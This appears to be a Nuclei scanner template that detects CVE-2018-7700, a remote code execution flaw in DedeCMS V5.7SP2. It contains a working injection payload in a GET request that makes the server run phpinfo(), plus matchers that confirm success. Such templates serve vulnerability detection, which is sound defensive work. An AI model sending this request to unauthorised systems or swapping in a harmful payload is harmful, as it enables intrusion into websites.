id: CVE-2018-7700 info: name: DedeCMS V5.7SP2 RCE author: pikpikcu severity: high reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ tags: cve,cve2018,dedecms,rce requests: - method: GET path: - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" matchers-condition: and matchers: - type: word words: - "phpinfo" - "PHP Version" part: body condition: and - type: status status: - 200